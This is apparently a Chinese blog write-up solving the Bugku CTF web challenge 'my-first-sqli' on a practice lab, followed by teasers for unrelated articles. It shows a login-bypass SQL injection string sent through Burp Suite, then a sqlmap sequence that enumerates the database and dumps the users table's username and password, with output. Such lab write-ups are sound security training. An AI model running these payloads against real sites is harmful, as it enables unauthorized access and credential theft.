Bugku CTF_Web——my-first-sqli

ops/2024/11/24 14:06:55/

Bugku CTF_Web——my-first-sqli

进入靶场

在这里插入图片描述

随便输一个看看

在这里插入图片描述

点login没有任何回显

方法一:

上bp抓包

在这里插入图片描述

放到repeter测试

在这里插入图片描述

试试万能密码(靶机过期了重新开了个靶机)

'admin or 1=1--+

在这里插入图片描述

shellmates{SQLi_goeS_BrrRrRR}

方法二:

拿包直接梭哈sqlmap

爆库

python sqlmap.py -r "***.txt"  --dbs

在这里插入图片描述

接着爆表

python sqlmap.py -r "***.txt"  -D SQLite --tables

+-------+
| users |
+-------+

在这里插入图片描述

爆字段

python sqlmap.py -r "***.txt"  -D SQLite -T users --columns

+----------+------+
| Column   | Type |
+----------+------+
| password | TEXT |
| username | TEXT |
+----------+------+

在这里插入图片描述

读取字段

查看username和password

python sqlmap.py -r "***.txt"  -D SQLite -T users -C username --dump

+----------+
| username |
+----------+
| admin    |
+----------+

在这里插入图片描述

接下来读取password就行了

python sqlmap.py -r "***.txt"  -D SQLite -T users -C password --dump

+----------------------------------------+
| password                               |
+----------------------------------------+
| sYbtomeoGjP62xPS05wqHY5R7cZqFW5jD0Cg6w |
+----------------------------------------+

在这里插入图片描述

登录试试

在这里插入图片描述

在这里插入图片描述

拿到flag

shellmates{SQLi_goeS_BrrRrRR}

在这里插入图片描述


http://www.ppmy.cn/ops/136319.html

相关文章

python之开发笔记

python之开发笔记

1、图标插件pyecharts pyecharts - A Python Echarts Plotting Library built with love. Document --javascripttypescriptshellbashsqljsonhtmlcssccppjavarubypythongorustmarkdown #导包 from pyecharts.charts import Line from pyecharts.options import TitleOpts,L…
阅读更多...
1000:入门测试题目(http://ybt.ssoier.cn:8088/problem_show.php?pid=1000)

1000:入门测试题目(http://ybt.ssoier.cn:8088/problem_show.php?pid=1000)

时间限制: 1000 ms 内存限制: 32768 KB 【题目描述】 求两个整数的和。 【输入】 一行&#xff0c;两个用空格隔开的整数。 【输出】 两个整数的和。 【输入样例】 2 3 【输出样例】 5 提交 代码 #include<bits/stdc.h> using namespace std; int a,b; in…
阅读更多...
基于微信小程序的校园二手交易平台设计与实现,微信小程序(定制+讲解+咨询)校园二手商品在线交易系统、校园二手市场管理与推荐工具、智能化商品交易与推荐平台

基于微信小程序的校园二手交易平台设计与实现,微信小程序(定制+讲解+咨询)校园二手商品在线交易系统、校园二手市场管理与推荐工具、智能化商品交易与推荐平台

博主介绍&#xff1a; ✌我是阿龙&#xff0c;一名专注于Java技术领域的程序员&#xff0c;全网拥有10W粉丝。作为CSDN特邀作者、博客专家、新星计划导师&#xff0c;我在计算机毕业设计开发方面积累了丰富的经验。同时&#xff0c;我也是掘金、华为云、阿里云、InfoQ等平台…
阅读更多...
万有引力定律和库仑定律:自然的对称诗篇

万有引力定律和库仑定律:自然的对称诗篇

万有引力定律和库仑定律&#xff1a;自然的对称诗篇 在宇宙深邃的知识长河中&#xff0c;万有引力定律和库仑定律恰似两颗璀璨的明珠&#xff0c;闪耀着人类智慧与自然奥秘的光辉。 十七世纪&#xff0c;牛顿在对天体运行的深邃思索中&#xff0c;拨开重重迷雾&#xff0c;发现…
阅读更多...
【数据分享】中国价格统计年鉴(2013-2024) PDF

【数据分享】中国价格统计年鉴(2013-2024) PDF

数据介绍 犹如一座珍贵的宝库&#xff0c;全面而系统地记录了中国在这一时期的价格变动情况。它涵盖了丰富的内容&#xff0c;包括宏观经济指标、商品价格、居民消费价格以及城市物价监测等多个方面。 在宏观经济指标方面&#xff0c;年鉴中收录了 GDP、CPI、PPI 等重要数据&…
阅读更多...
软件世界中的超级bug有哪些?

软件世界中的超级bug有哪些?

软件世界中的超级bug有很多&#xff0c;以下是一些历史上著名的案例&#xff1a; 1. Mars Climate Orbiter 1998&#xff1a;由于代码中的一个简单错误&#xff0c;导致火星气候轨道器发送了错误的导航信号&#xff0c;最终导致任务失败&#xff0c;损失超过1800万美元。 2. M…
阅读更多...
华为防火墙技术基本概念学习笔记

华为防火墙技术基本概念学习笔记

1.防火墙概述 1.1防火墙与交换机、路由器对比 路由器与交换机的本质是转发&#xff0c;防火墙的本质是控制。 防火墙与路由器、交换机是有区别的。路由器用来连接不同的网络&#xff0c;通过路由协议保证互联互通&#xff0c;确保将报文转发到目的地;交换机则通常用来组建局域…
阅读更多...
【代码大模型的隐私安全】Unveiling Memorization in Code Models论文阅读

【代码大模型的隐私安全】Unveiling Memorization in Code Models论文阅读

论文阅读 Unveiling Memorization in Code Models key word: LLM for SE, security and privacy 论文链接&#xff1a;https://arxiv.org/abs/2308.09932 仓库链接&#xff1a;https://github.com/yangzhou6666/Privacy-in-CodeModels 【why】 现存模型的出色表现可以归因于先…
阅读更多...
最新文章

Copyright @ 2022~2023